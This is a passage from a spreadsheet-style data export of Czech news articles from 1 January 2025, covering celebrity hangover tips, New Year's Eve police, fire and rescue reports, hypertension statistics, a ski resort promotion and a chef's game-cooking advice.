    <t>Tipy slavných, jak přežít kocovinu: Beatu Rajskou napraví vývar od manžela, Pepa Vojtek radí nepít a meditovat Zeptali jsme se našich slavných osobností, jak naložit s novoroční kocovinou. Návrhářka Beata Rajská doporučuje s láskou den předem připravovaný vývar, Veronika Chmelířová vietnamskou polévku pho. Milan Peroutka nezapomíná doplňovat doplňovat minerály. A Pepa Vojtek ? Ten radši nepije vůbec a místo toho medituje. "Nejlepší je nepít alkohol vůbec a nikdy. Bezpečná dávka alkoholu je 0,0", uvedl nedávno pro magazín Lifee.cz MUDr. Karel Nešpor , CSc ., psychiatr specializující se na léčbu návykových nemocí a skutečná ikona české adiktologie. Je tedy pouze na nás, s jakou náladou se probudíme do roku 2025. Ideální je žádnou kocovinu nemít. Na tom se shodují i naše slavné osobnosti, kterých jsme se vyptávali na tipy pro prohýřené noci. Patří sem dlouze tažené vývar y , minerály, vitamíny , nebo třeba sklenice vody těsně předtím, než se jde spát. Doporučené video: Pepa Vojtek radí, jak na kocovinu Pepa Vojtek raději medituje Zpěvák Pepa Vojtek (59) si během své rockové kariéry vypil své . Dnes říká, že už raději nepije. „To si asi každý musí zažít. Já myslím, že nejlepší lék na kocovinu je nechlastat . Když jsem byl ještě mladý a s kapelou jsme jezdili po republice, tak jsme života užívali hodně. A neřešili jsme to. Prostě nám bylo blbě, tak jsme to přepili a jelo se dál ," svěřil nám v rozhovoru tip známých rockerů. Dnes by za něj ruku do ohně nedal. Stejně je podle něj nakonec nejlepší abstinovat. " Teď už je člověk starší a třeba já si řekl, že už jsem si své vypil. Už mě vlastně ani nebaví pít. Místo toho se raději věnuji meditacím a dám si jenom gin nebo pivo nebo nějakou kořalku . Pochopitelně v míře! Samozřejmě, že piju s mírou." Beata Rajská sází na vývar Návrhářka Beata Rajská (62) , která pochází ze Slovenska , už rána po borovičce dokáže přestát . Má na to svoji unikátní metodu. Tu mimo jiné uznávají také modelky. "Vypít po návratu dvě sklenice vody a ráno žádné kafe, ale vývar!" radí návrhářka. " Manžel připravuje vývar s předstihem, ještě než odejdeme. " Mohlo by Vás zajímat: Victoria Beckham má skvělý trik pro ženy s kocovinou: Oteklý obličej vyřeší jeden odvážný krok Andrea Bezděková pije sklenici vody Modelka Andrea Bezděková (30) mívá po večírcích také žaludek na vodě . Univerzální pravidlo ale podle ní skoro neexistuje. "Většinou mi nezabírá nic, tak bývám zaparkovaná v posteli a čekám, až to přejde . A nebo - těsně, než se jde spát, vypít sklenici vody. Vždycky se extrémně napiju ." Milan Peroutka doplňuje minerály Zpěvák Milan Peroutka (34) raději volí cestu ověřenou lékaři. "Kocovina? Mám rád minerálky, na kocovinu je dobré doplňovat minerály," dává svůj ověřený tip. "K tomu přidávám vývary, to je známá věc. Rád je vařím a představuji si jejich sílu. To, co si představuješ a věříš tomu, to funguje." Mohlo by Vás zajímat: Celebrity radí, jak na kocovinu: Vojtek místo pití radši medituje, Gemrotová sází na chlazené jablko Veronika Chmelířová si dává hrst vitaminů Modelka Veronika Chmelířová (38) je stejně jako Milan Peroutka věrná ověřeným radám lékařů. "Když vím, že bude divočejší večírek, tak se snažím v průběhu večera pít hodně vody . Většinou se mi to moc nedaří, ale ono to fakt funguje," překvapuje blondýnka se svým unikátním receptem. " Než jdu spát, dám si hrst jakýchkoliv vitaminů - céčko, multivitamin, omega-3 . Opravdu mi to zabralo, nebylo to tak hrozné." Důležité je podle Chmelířové také naplánovat taktiku na příští den. "Druhý den ideálně spát, co to jde. Vyspat se z toho. Výborné jsou druhý den vývary, třeba pho. Snažím se kocovinám vyhýbat - vyspat se a hodně vody." Na fotografie celebrit, které se zapojily do naší unikátní ankety, se můžete podívat v naší fotogalerii. Galerie Tipy slavných, jak přežít kocovinu: Beatu Rajskou napraví vývar od manžela, Pepa Vojtek radí nepít a meditovat + 5 fotek + 6 fotek Návrhářka Beata Rajská má na kocovinu osvědčené lahodné vývary od svého manžela. Zdroj: Herminapress Zpěvák Milan Peroutka sází na doplňování minerálů. Milan Peroutka je s Beatou Rajskou jedna ruka - shodují se na tom, že lepší je vůbec nepít. Zleva: Milan Peroutka , Beata Rajská , Dominik Peroutka, Andrea Bezděková . Modelka Andrea Bezděková doporučuje sklenici vody po večírku. Milan Peroutka s Beatou Rajskou zvládají večírky "levou zadní". Pepa Vojtek prý dnes namísto pití alkoholu medituje - nebo si dá gin. Modelka Veronika Chmelířová si dává před spaním hrst vitaminů. Andrea Bezděková silvestrovskou kocovinu nakonec úplně nejraději zaspí. Zdroj: Herminapress/koláž Lifee Autor: Veronika Nováková Autor person Veronika Nováková</t>
  </si>
  <si>
    <t>20250101_286_3695262216_4975f868cda86bd90419.html</t>
  </si>
  <si>
    <t>4975f868cda86bd90419</t>
  </si>
  <si>
    <t>Při oslavách Silvestra se na Táborsku ztratil senior, policie po něm pátrá</t>
  </si>
  <si>
    <t>Při oslavách Silvestra se na Táborsku ztratil senior, policie po něm pátrá Při oslavách se na Táborsku ztratil muž, nalezli jej v pořádku v jiné obci 1. ledna 2025 8:54 , aktualizováno 12:20 Sdílet článek | foto: ČTK Při odchodu z oslav silvestra se na Táborsku ztratil senior. Policisté po něm od noci pátrali. Devětašedesátiletý muž odešel z večírku v obci Dírná po 22:00 a nakonec dnes dopoledne skončil v nedaleké obci, kam sám došel. Muž je v pořádku. Kromě toho policie na jihu Čech nezaznamenala v souvislosti s oslavami nového roku žádnou mimořádnou událost. Podobně na tom byli i hasiči a záchranáři v kraji. Vyplývá to z informací ČTK . Pohřešovaného seniora z Táborska hledal i vrtulník. "Muž ušel několik kilometrů do vsi poblíž místa, z něhož odešel. Pohřešovaného našel místní obyvatel, který přivolal policisty. Podchlazeného a viditelně zraněného pohřešovaného si převzali záchranáři," uvedla mluvčí jihočeské policie Lenka Krausová . Dodala, že policie v kraji do 06:30 řešila přibližně stovku různých událostí. "Nejčastěji se jednalo o rušení nočního klidu, vzájemné napadání nebo sousedské spory," řekla mluvčí. Záchranáři na jihu Čech v noci na dnešek řešili 121 událostí, což je o 70 procent více v porovnání s jinou noční směnou. Ve dvou desítkách případů se jednalo o úrazy nebo jiné problémy spojené s pitím alkoholu . Ošetřili také muže, jehož poranila pyrotechnika. Stalo se to u Lipna na Českokrumlovsku, když mu pyrotechnika vybuchla v ruce a poranila dlaň. "Jednalo se o jediné zranění zábavní pyrotechnikou," uvedla mluvčí jihočeských záchranářů Petra Kafková. Jihočeští hasiči při silvestrovské noci zasahovali u 14 požárů popelnic nebo odpadkových košů, čtyř požárů křoví a požáru chatky v Bežerovicích u Bechyně na Táborsku. "Hořela chatka půdorysu asi osm krát osm metrů se škodou 100.000 korun, příčina vzniku se vyšetřuje. Celkem jsme měli 36 událostí," uvedl mluvčí hasičů v kraji Vratislav Malý. Dodal, že ve Starých Hodějovicích na Českobudějovicku po půlnoci hořelo asi 40 tújí u rodinného domu. Hasiči oheň zlikvidovali za několik minut. Autor: ČTK Sdílet článek Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20250101_287_3695262211_4e1fc7307adb907d295c.html</t>
  </si>
  <si>
    <t>4e1fc7307adb907d295c</t>
  </si>
  <si>
    <t>Pyrotechnika o silvestrovské noci v Ústeckém kraji způsobila několik amputací</t>
  </si>
  <si>
    <t>Pyrotechnika o silvestrovské noci v Ústeckém kraji způsobila několik amputací Policie i hasiči v Ústeckém kraji vyjížděli k požárům, oheň zachvátil dům 1. ledna 2025 8:54 , aktualizováno 10:55 Sdílet článek ilustrační snímek | foto: Metro.cz Policisté i hasiči o silvestrovské noci vyjížděli k drobnějším požárům, oheň zachvátil rodinný dům v Černěvsi na Litoměřicku a bývalou pilu v Rybništi na Děčínsku. Požár rodinného domu zřejmě vznikl od přímotopu a předběžně způsobil škodu přesahující sedm milionů korun. Obešel se bez zranění. Přesnou příčinu a škodu určí vyšetřovatelé. Hořelo také několik popelnic nebo dutina stromu. Policisté byli povoláni k několika lidem vyhrožujícím sebevraždou, kteří byli převezeni do nemocnic. ČTK to dnes řekli mluvčí policie Ilona Gazdošová a mluvčí hasičů Milan Rudolf. "Byly to i různé rodinné potyčky a dohady, u kterých jsme byli napříč krajem několikrát," uvedla Gazdošová. Podle ní se budou incidenty řešit v přestupkovém řízení. Roli sehrál v řadě případů alkohol . Policisté od půlnoci do 07:00 přijali na tísňové lince 206 hovorů, zhruba stejně jako předloni. Hasiči vyjížděli od úterních 17:57 do dnešních 02:00 k 52 událostem spojeným s oslavami příchodu nového roku. Podle Rudolfa se jednalo o požáry popelnic či krabic od pyrotechniky. První jednotka na silvestra vyrazila do Žatce , kde ve volném prostranství hořela pyrotechnika, kterou hasiči prolili vodou. Ve Starých Křečanech na Děčínsku likvidovali hasiči hořící pyrotechniku v dutině stromu. Při příjezdu na místo se hasiči ještě mohli potěšit světelnými efekty, pak pomocí žebříku prolili starou prohnilou lípu vodou. Největší noční požár vypukl v Černěvsi a zaměstnal několik jednotek. Rudolf podotkl, že neměl spojitost se silvestrovskými oslavami. V domě žila podle dostupných informací jedna rodina. Ačkoliv požár zasáhl podkroví domu, voda, kterou hasiči oheň likvidovali, se dostala i do nižších pater. Rodina si proto zřejmě musela v noci sehnat náhradní ubytování. Další požár, který se zřejmě netýkal oslav příchodu roku 2025, likvidovali hasiči v Rybništi na Děčínsku. Bývalá budova pily zcela vzplála. "Odvětráváme objekt a necháváme ho dohořet," řekl dnes ráno Rudolf. Hasiči požár později lokalizovali. Hasiči před silvestrovskou nocí vydali upozornění, aby se lidé vyvarovali používání pyrotechniky v blízkosti výskytu většího množství zvěře a hořlavých látek. Varovali je před odpalováním ohňostrojů v podnapilém stavu a také upozornili, že zábavní pyrotechnika nepatří do rukou dětem. V ústeckém městském obvodu Severní Terasa například úřad zabezpečil odpadkové koše, aby do nich nebylo možné házet pyrotechniku. V Ústeckém kraji trvá již několik dní inverze. Kvůli počasí proto město Most přesunulo novoroční ohňostroj na 5. ledna, původně ho plánovalo z hradu Hněvín odpálit v úterý. Počasí znepříjemnilo sledování ohňostrojů například lidem na Ústecku, kde přes hustou mlhu pronikaly pouze barevné odlesky. Přesto se lidé hlučné zábavě oddávali do brzkých ranních hodin. Autor: ČTK Sdílet článek Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20250101_288_3695251817_724e98738c0d8e840bab.html</t>
  </si>
  <si>
    <t>724e98738c0d8e840bab</t>
  </si>
  <si>
    <t>Počet lidí, kteří se léčí s vysokým krevním tlakem, za poslední dekádu vzrostl o polovinu</t>
  </si>
  <si>
    <t>Počet lidí, kteří se léčí s vysokým krevním tlakem, za poslední dekádu vzrostl o polovinu Autor: redakce ČR – Počet klientů VZP s diagnózou vysokého krevního tlaku v posledních deseti letech výrazně vzrostl. Zatímco v roce 2014 lékaři vykázali hypertenzi u 856 tisíc pacientů, loni se jejich počet zvýšil na 1,3 milionu. Počet léčených pacientů v průběhu deseti let tak vzrostl o 50 %. Růst počtu pacientů s touto diagnózou je podle odborníků alarmující. „Problém s vysokým krevním tlakem mohou v první řadě odhalit preventivní prohlídky u praktického lékaře, na které má pacient nárok každé 2 roky. I to je jeden z mnoha dobrých důvodů, proč toto vyšetření nevynechat,“ říká náměstek ředitele VZP pro zdravotní péči Jan Bodnár. Hypertenze je označována za „tichého zabijáka“, protože sama o sobě nebolí a mnohdy není včas odhalena. Její důsledky však mohou být závažné a v některých případech i fatální. Náklady VZP na léčbu hypertenze dosáhly v roce 2023 částky 3,5 mld. Kč. Tyto výdaje přitom nezahrnují léčbu komplikací, které vysoký krevní tlak často způsobuje, například cévních mozkových příhod, infarktů, ischemické choroby srdeční či selhání ledvin (např. péče o pacienty po cévních mozkových příhodách stojí VZP každoročně 6,6 mld. Kč, léčba infarktů pak dalších 1,4 mld. Kč). Vysoký krevní tlak je přitom onemocnění, kterému lze ve většině případů účinně předcházet. Přestože některé rizikové faktory, jako věk, dědičnost nebo pohlaví, ovlivnit nelze, zdravý životní styl hraje zásadní roli v jeho prevenci. Zdravá strava s omezením soli, pravidelná fyzická aktivita, nekouření, vyhýbání se nadměrné konzumaci alkoholu a zvládání stresu mohou významně snížit riziko rozvoje tohoto onemocnění. Pro včasné odhalení hypertenze a zahájení léčby jsou zásadní preventivní prohlídky u praktického lékaře, které zahrnují také měření krevního tlaku. (TZ/VZP) Nikdy nezmeškejte žádnou důležitou zprávu. E-mail Autor: redakce Rubrika transition_slide ZPRÁVY ČR</t>
  </si>
  <si>
    <t>171</t>
  </si>
  <si>
    <t>20250101_289_3695157675_43bb4caa110588a2043f.html</t>
  </si>
  <si>
    <t>43bb4caa110588a2043f</t>
  </si>
  <si>
    <t>Praha přivítala rok 2025: záchranáři ošetřili desítky lidí, hasiči měli napilno</t>
  </si>
  <si>
    <t>Praha přivítala rok 2025: záchranáři ošetřili desítky lidí, hasiči měli napilno /FOTOGALERIE , VIDEO/ Bouřlivé oslavy příchodu nového roku si v metropoli a především na Staroměstském náměstí nenechaly ujít stovky lidí. Na slavení Silvestra spojené s alkoholem a také pyrotechnikou se záchranné složky pečlivě připravili. Pražští záchranáři opět v centru hlavního města postavili svůj GOLEM. ... Celý článek naleznete na: prazsky.denik.cz/... Autor: Lasty Webdesign Autor person Lasty Webdesign</t>
  </si>
  <si>
    <t>20250101_29_3697780333_79ec4195b4abdaaf17d5.html</t>
  </si>
  <si>
    <t>79ec4195b4abdaaf17d5</t>
  </si>
  <si>
    <t>Na Silvestra se srazila auta u Velkého Beranova. Jedna řidička se zranila</t>
  </si>
  <si>
    <t>Na Silvestra se srazila auta u Velkého Beranova . Jedna řidička se zranila Nehoda se stala na Silvestra u Velkého Beranova . Řidič jel kolem půl sedmé ráno v autě značky Citroen Berlingo směrem od Nových Domků. „Při vjíždění do křižovatky nedal přednost v jízdě po hlavní silnici jedoucímu automobilu Škoda Scala, do kterého narazil,“ popsala policejní mluvčí Jana Kroutilová . Krimi Řidička škodovky se při nehodě zranila a zdravotníci ji převezli do jihlavské nemocnice. Dechová zkouška na alkohol byla u obou řidičů negativní. Škoda na autech je více než sto padesát tisíc korun. „Řidič citroenu je podezřelý ze spáchání přestupku na úseku dopravy,“ doplnila mluvčí. Autor: František Vondrák Autor František Vondrák</t>
  </si>
  <si>
    <t>4490</t>
  </si>
  <si>
    <t>5230</t>
  </si>
  <si>
    <t>20250101_290_3694651913_e8160507593e7f4526f3.html</t>
  </si>
  <si>
    <t>e8160507593e7f4526f3</t>
  </si>
  <si>
    <t>Zima v Rakousku bude pestrá!</t>
  </si>
  <si>
    <t>Zima v Rakousku bude pestrá! ceskeobzory.cz – redakce 1 ledna, 2025 Jazzové koncerty na horských chatách i v kostelích, živá vystoupení DJ na sjezdovkách, testování nejnovějších sněžných prken i světový šampionát v lyžování – taková bude zimní sezóna v rakouském Leogangu. V jednom z nejlepších alpských středisek se snoubí špičkové lyžování s dokonalými wellness zážitky i pestrou nabídkou aktivit. Leogang je součástí největšího rakouského lyžařského komplexu Skicircus Saalbach Hinterglemm Leogang Fieberbrunn, který nabízí 408 kilometrů propojených sjezdovek. “Najdete tu vše – od modrých svahů pro začátečníky přes červené tratě až po náročné černé sjezdy. Systém lanovek a vleků je tak důmyslný, že zvládnete projet celé údolí během jednoho dne. Pro skutečné milovníky lyžování je tu The Challenge, což je nejdelší lyžařský okruh v Alpách s délkou 65 kilometrů. Najdete tu ovšem také moderní snowparky a freeridové zóny, které patří k těm nejlepším v Evropě ,” říká Michael Michael Madreiter, jeden z majitelů resortu Puradies v rakouském Leogangu s tím, že výběr aktivit je zde obrovský. A to nejen sportovních. Zde je to nejzajímavější, co tady tuto sezónu můžete zažít: 1. Otestujte nejlepší modely lyží (3. – 26. 1. 2025) Testovací dny těch nejšpičkovějších světových modelů lyží proslulých značek jsou v Leogangu oblíbenou každoroční aktivitou a vy si ji nenechte ujít. Odborníci na místě najdou ideální lyže pro vás, rovnou vám je na míru seřídí a pak už můžete vyrazit na jízdu svých snů. 2. Netradiční koncerty (24. – 26. 1. 2025) Celkem tři dny plné jazzu nabídnou devět koncertů na různých neobvyklých místech. Pět koncertů se uskuteční v Kunsthausu Nexus v Saalfeldenu , dva v Hornickém a gotickém muzeu Leogang, jeden ve farním kostele v Saalfeldenu a jeden se dokonce bude konat na dechberoucím prostranství hory Asitz, kam vás vyveze lanovka. 3. Mistrovství světa v alpském lyžování (4. – 16. 2. 2025) V areálu Skicircus Saalbach Hinterglemm Leogang Fieberbrunn budou na světovém šampionátu v alpském lyžování o zlato bojovat velké hvězdy jako je Mikaela Shiffrin, Marco Odermatt či Němec Linus Straßer. Pro diváky to bude nejen skvělá podívaná, ale především velká ochutnávka toho nejlepšího, co toto místo nabízí, protože se mohou dostat i na samotné sjezdovky – všechny vleky a sjezdovky v celém Skicirkusu totiž zůstanou během mistrovství světa v provozu. 4. Festival na sjezdovkách (21.–30. 3. 2025) White Pearl Mountain Days, tak se jmenuje festival, který bude oslavou lyžování, ale nejen toho. Na sjezdovkách, horských chatách a dalších místech Skicirkusu Saalbach Hinterglemm Leogang Fieberbrunn se můžete těšit na bohatý doprovodný program, který uspokojí milovníky sportu, dobré hudby i jídla. Na sjezdovkách vám budou dělat společnost mezinárodní DJs, kteří svými živými koncerty vykouzlí nezapomenutelnou atmosféru. 5. Lázně, které vás vynesou do wellness nebe Heaven Spa jsou nové luxusní lázně, které najdete v Leogangu v hotelu Puradies. Ten si už vysloužil řadu designových ocenění a brzy bude jistě aspirovat na další, se svým wellness areálem. Ten dokonale splývá s okolní krajinou, protože je z jedné strany ukryt v kopci, z té druhé se otevírá pohled do nejkrásnějšího kina na světě – na pohoří Leoganger Steinberge. Díky nekonečným proskleným plochám, které najdete dokonce i ve voňavých panoramatických saunách, máte neustále pocit, že jste součástí okolních horských velikánů. Nechybí tady parní lázně, infrakabiny, vnitřní i venkovní plavecký bazén, přírodní koupací jezírko, unikátní relaxační ostrůvky, sluncem rozzářené fitness centrum a prosluněné terasy. Je to zkrátka ideální místo pro odpočinek po lyžování i získání potřebné vnitřní rovnováhy. Více na www.puradies.at Tip na výhodné lyžování: S kartou Ski ALPIN CARD můžete jezdit nejen ve Skicircusu, ale také na ledovci Kitzsteinhorn nebo v oblasti Schmittenhöhe v Zell am See. Celkem vás čeká 408 kilometrů sjezdovek. Cena na tři dny začíná na 222 eurech pro dospělé. Pro mladé do 19 let je tu navíc Junior XPLORE CARD, která stojí jen 15 eur na den. A pokud sem míříte s dětmi, využijte akce Kids on Ski, v níž zapojení partneři nabízejí malým lyžařům do 5 let lyžařské kurzy, půjčení vybavení i ubytování zdarma. Více na www.saalfelden-leogang.com Zdroj a foto: www.saalfelden-leogang.com a www.puradies.com Podobné příspěvky 7 června, 2024 2 června, 2024 Návštěvníci Botanické zahrady hl. m. Prahy míří do areálu v Troji nejenom kvůli rozkvetlým záhonům a přehlídce vzácných rostlin, ale i za vínem . V současné době už si mohou vychutnat vína ročníku 2023 z produkce Vinice sv. Kláry . Ta se rozkládá na jižních svazích Trojské kotliny, které poskytují jedinečné podmínky pro pěstování vinné révy. Poslední ročník nabízí dvě… ceskeobzory.cz – redakce 28 listopadu, 2024 V hypermarketech Globus se letos zřejmě stane před Vánoci rekord. Tamní pekaři a cukráři totiž budou ručně vyrábět největší množství vánočního pečiva za poslední roky, reagují tak na zvýšenou poptávku zákazníků. Ti mohou v Globusu nově koupit cukroví i na váhu. Řezníci tradičně nachystají sváteční šunky i vinné klobásky a v nápojích budou připraveny oblíbené dárkové kazety prémiových… 11 října, 2024 20 října, 2024 Už 12. října vypukne na Ještědu největší adrenalinová honička roku. Celkem 300 bikerů se vrhne dolů z kopce a v patách jim budou tři ostřílení lišáci – legendy české i světové bike scény Tomáš Slavík , Michal Maroši a Michal Prokop . Česká verze světově proslulého závodu Red Bull Foxhunt slibuje drsnou a super rychlou jízdu plnou technických výzev… 16 srpna, 2024 30 září, 2024 FESTKA, český výrobce špičkových karbonových kol se sídlem v Praze , a trutnovské Centrum současného umění EPO1 přichystalo pro návštěvníky výstavy Jízda, která se věnuje ztvárnění bicyklů a jejich role v životě člověka, originální doprovodný program na sobotu 17. srpna. Součástí akce, která proběhne od 13 do 16 hodin bude odhalení unikátního kola, které vzniklo ve… ceskeobzory.cz – redakce 7 ledna, 2025 Lyžařské školy už dávno neslouží pouze k výuce dětí. Stále více dospělých se rozhoduje zdokonalit své dovednosti, nebo se dokonce učit od základů pod vedením profesionálů. Tento trend potvrzuje i Jakub Neubauer z lyžařské školy Razulák ve Velkých Karlovicích . Zde si zájemci všech věkových kategorií mohou osvojit nejen techniku sjezdového lyžování, ale také snowboarding či… ceskeobzory.cz – redakce 25 června, 2024 Letos proběhne již 16. ročník soutěže o značku Dobrý tuzemský potravinářský výrobek„ČESKÁ CHUŤOVKA 2024″ a 14. ročník soutěže o značku „DĚTSKÁ CHUŤOVKA 2024“ RADOST Z JÍDLA JE KLÍČOVOU SOUČÁSTÍ STRAVOVACÍHO NÁVYKU České potravinářství je pod stále větším tlakem nejen veřejnosti, ale i byrokratických struktur, přičemž zejména to druhé výrobcům příliš nepomáhá. Pokud například průměrná spotřeba piva … Autor: ceskeobzory.cz – redakce</t>
  </si>
  <si>
    <t>20250101_291_3883750265_b079e23dfbcb6843e241.html</t>
  </si>
  <si>
    <t>b079e23dfbcb6843e241</t>
  </si>
  <si>
    <t>Nebojte se zvěřiny. Šéfkuchař Tritonu vám poradí, jak ji připravit :: Frýdek-Místek :: Zpravodajství z okresu Frýdek-Místek a okolí</t>
  </si>
  <si>
    <t>Nebojte se zvěřiny. Šéfkuchař Tritonu vám poradí, jak ji připravit :: Frýdek-Místek :: Zpravodajství z okresu Frýdek-Místek a okolí Nebojte se zvěřiny. Šéfkuchař Tritonu vám poradí, jak ji připravit Tomáš Kohút - šéfkuchař pražské zážitkové restaurace Triton. Autor / zdroj foto: Lucie Čeňková Zvěřina představuje v české kuchyni zvláštní paradox. Přestože patří k absolutně nejlepším a nejzdravějším surovinám, na našem menu se objevuje spíše výjimečně. To se snaží změnit šéfkuchař pražské zážitkové restaurace Triton Tomáš Kohút. Jak takovou marinádu připravit? „V Tritonu používáme miso pro dodání chutě umami, červené víno a kampotský pepř, jenž dodá lehce pikantní nádech,“ prozrazuje šéfkuchař restaurace Triton, jenž sídlí v umělé jeskyni na Václavském náměstí . A připojuje další radu týkající se samotné přípravy. „Při vaření zvěřiny doporučuji metodu sous vide, která zajistí rovnoměrné tepelné zpracování a zamezí vysušení. Maso si tak zachová svou jemnost a šťavnatost.“ Zvěřina si podle zkušeného šéfkuchaře rozumí s výraznými omáčkami, jako je omáčka z černého rybízu, jalovce nebo červeného vína . A jako přílohu doporučuje kaši z kořenové zeleniny nebo bylinkovou polentu. Vedle zvěřina rád pracuje také s chuťově výrazným a aromatickým jehněčím, které opět patří k nedoceněným surovinám. Přitom jehněčí hřbet má ve světové kuchyni pověst jedné z největších delikates. „Také jehněčí připravuji metodou sous vide při teplotě 54 °C po dobu 1 hodiny, aby si zachovalo jemnou texturu a přirozenou šťavnatost,“ radí Tomáš Kohút, který v Tritonu servíruje jehněčí s fantastickou mátovou omáčkou připravenou z kvalitního demi-glace, čerstvé máty, medu a balsamikového octa. Autor / zdroj: Lucie Čeňková Autor: Autor / zdroj foto: Lucie Čeňková</t>
  </si>
  <si>
    <t>20250101_292_3701240166_6d8cd3d333b803a558cd.html</t>
  </si>
  <si>
    <t>6d8cd3d333b803a558cd</t>
  </si>
  <si>
    <t>Pohádal se s kamarádem, pak rozbil sklo u zastávky autobusu. Postihu neujde</t>
  </si>
  <si>
    <t>Pohádal se s kamarádem, pak rozbil sklo u zastávky autobusu. Postihu neujde 01.01.2025 Hádka s kamarádem skončila ve středu nad ránem na Lidické třídě rozbitou skleněnou výplní zastávky MHD. Počínání čtyřiadvacetiletého muže však neušlo náhodným svědkům. O zadržení pachatele se postarala hlídka městské policie. Ve středu 1. ledna ve tři hodiny ráno vyjížděla hlídka městské policie na oznámení o muži, který právě rozbil skleněnou výplň zastávky MHD u Polikliniky Jih. Strážníci se okamžitě vydali po stopách muže odpovídajícího popisu pachatele. Toho se hlídce podařilo dostihnout na Náměstí Jiřího z Poděbrad. Čtyřiadvacetiletý muž šel na dotaz strážníků bez delšího zapírání s pravdou ven. Svěřil se, že po hádce se svým kamarádem ve vzteku udeřil do skla přístřešku, které nápor nevydrželo. Nebylo divu, že svou úlohu v případu hrál alkohol . Následně provedená orientační dechová zkouška na alkohol u něj totiž ukázala 2,24 promile. Muž se bude po vystřízlivění zpovídat z přestupku proti majetku, za který mu hrozí pokuta až 50 tisíc korun. Případem se bude dále zabývat příslušný správní orgán. Autor: Věra Školková Autor person Věra Školková</t>
  </si>
  <si>
    <t>20250101_293_3694776513_16d45ea5227cf51db591.html</t>
  </si>
  <si>
    <t>16d45ea5227cf51db591</t>
  </si>
  <si>
    <t>Rušnou noc měli v kraji hlavně záchranáři, do rána řešili 260 událostí. První miminko roku se narodilo&amp;nbsp;v Jablonci nad Nisou</t>
  </si>
  <si>
    <t>Rušnou noc měli v kraji hlavně záchranáři, do rána řešili 260 událostí. První miminko roku se narodilo&amp;nbsp;v Jablonci nad Nisou AKTUALIZOVÁNO: Zatímco policisté a hasiči v Libereckém kraji hodnotí silvestrovské oslavy jako poměrně klidné, záchranáři zažili perný přelom roku. Na silvestra až do dnešního rána se nezastavili, řešili přes 260 událostí, což je zhruba o stovku víc než běžně. O půlnoci jim na dispečinku svítilo číslo 199, to dlouho nikdo nepamatuje, a do rána bylo dalších 65 událostí, řekl krátce po 06:00 na Nový rok ČTK mluvčí Zdravotnické záchranné služby Libereckého kraje Michael Georgiev. "Ošetřili jsme sedm lidí, kteří se zranili při odpalování pyrotechniky, ale také desítky zranění a intoxikací alkoholem , desítky napadení. Záchranáři říkali, že tolik napadení a agrese nepamatují, naštěstí jsme nezaznamenali napadení zdravotníků. Ale většina těch událostí byla spjata s alkoholem," řekl Georgiev. Pokud jde o úrazy pyrotechnikou, i když jich bylo víc než v posledních letech, šlo podle něj naštěstí o lehká zranění. Policie hodnotí silvestrovskou noc jako klidnější. "Od 18:00 31. prosince do dnešních 05:30 jsme na tísňové lince přijali 113 hovorů. Většina z nich se týkala narušování občanského soužití v podobě verbálního ale i fyzického napadání jak na veřejnosti mezi cizími lidmi, tak i v soukromí mezi známými nebo rodinnými příslušníky, převážně jsme tyto případy kvalifikovali jako přestupky " řekla krajská policejní mluvčí Ivana Baláková. Jednu událost řeší podle Balákové policie pro podezření z trestného činu výtržnictví. "Došlo k němu v Novém Městě pod Smrkem , kde skupinka opilců napadla tři mladíky. Ten případ je zatím v počátku," doplnila policejní mluvčí. Tři řidiče přistihli policisté za volantem pod vlivem alkoholu , naměřili jim od 1,1 do 1,5 promile alkoholu v dechu. Policie také v noci pátrala po 57leté ženě z Harrachova , která zhruba hodinu po půlnoci odešla z domova a od té doby se nehlásila. S žádostí o pomoc se podle Balákové na policii obrátil manžel, který zjistil, že žena zmizela z domu. "Vzhledem k mrazivému počasí jsme do pátrání nasadili vrtulník s termovizí, ženu se díky tomu ráno podařilo objevit u Mumlavských vodopádů. Byla podchlazená, předali jsme ji do péče záchranářů," dodala policejní mluvčí. Za poměrně klidnou označili silvestrovskou noc hasiči, od silvestrovských 18:00 do dnešních 06:00 měli zhruba dvě desítky výjezdů, z toho 12 bylo požárů. "Ty požáry byly naštěstí kontejnery a obaly po pyrotechnice. Šlo o takové drobnější požáry většinou beze škody nebo jen se škodou způsobenou na těch kontejnerech. Loni jsme za stejnou dobu evidovali devět požárů, což je nárůst o 25 procent, ale stejně 12 požárů je poměrně klidná noc," dodala mluvčí Hasičského záchranného sboru Libereckého kraje Monika Tóthová. Prvním miminkem roku 2025 narozeným v Libereckém kraji je Adélka. Stejně jako první dítě loňského roku i ona přišla na svět v Nemocnici v Jablonci nad Nisou . Narodila se pět minut po půlnoci na Nový rok. Váží 2335 gramů. Rodiče jsou z Turnova a je to jejich první děťátko, řekla dnes ČTK mluvčí Nemocnice Jablonec Jana Luňáková. Další holčička se narodila 26 minut po půlnoci v Krajské nemocnici Liberec , v České Lípě a Jilemnici na první děti nového roku v 07:30 ještě čekali. "Maminka i dítě jsou v pořádku. Vzhledem k tomu, že porod proběhl císařským řezem, je nyní maminka na pooperačním pokoji, kde nejsou možné návštěvy," doplnila Luňáková. Za loňský rok se podle ní v Jablonci narodilo 948 dětí. "První děti narozené v Libereckém kraji dostanou stejně jako v minulých letech od hejtmana Martina Půty (Starostové pro Liberecký kraj ) pamětní zlatý dukát," řekl ČTK mluvčí krajského úřadu Filip Trdla. Rodiče první holčičky a prvního kluka dostanou také tradičně peněžitý dar 5000 korun a dětskou kosmetiku. Hrádecký výrobce dětských plen připravil podle něj pro první děti roku tradičně poukázky na pleny. Loni byl prvním miminkem narozeným v Libereckém kraji Filip, který se narodil na Nový rok 33 minut po půlnoci v Jablonci nad Nisou . Chlapeček, který dnes slaví první narozeniny, vážil při svém narození 3055 gramů. Jablonecká nemocnice držela prvenství i v předcházejících dvou letech, kdy byly prvním dítětem v kraji holčičky - v roce 2023 to byla Melanie a o rok dříve Maya . čtk Autor: admin1@genus.cz Autor person admin1@genus.cz Rubrika transition_slide Liberecký kraj</t>
  </si>
  <si>
    <t>343</t>
  </si>
  <si>
    <t>20250101_294_3742826500_00c6f418f45da25fa85d.html</t>
  </si>
  <si>
    <t>00c6f418f45da25fa85d</t>
  </si>
  <si>
    <t>SLOVÁCKÝ GEN - Josef Janoušek | iDobryDen</t>
  </si>
  <si>
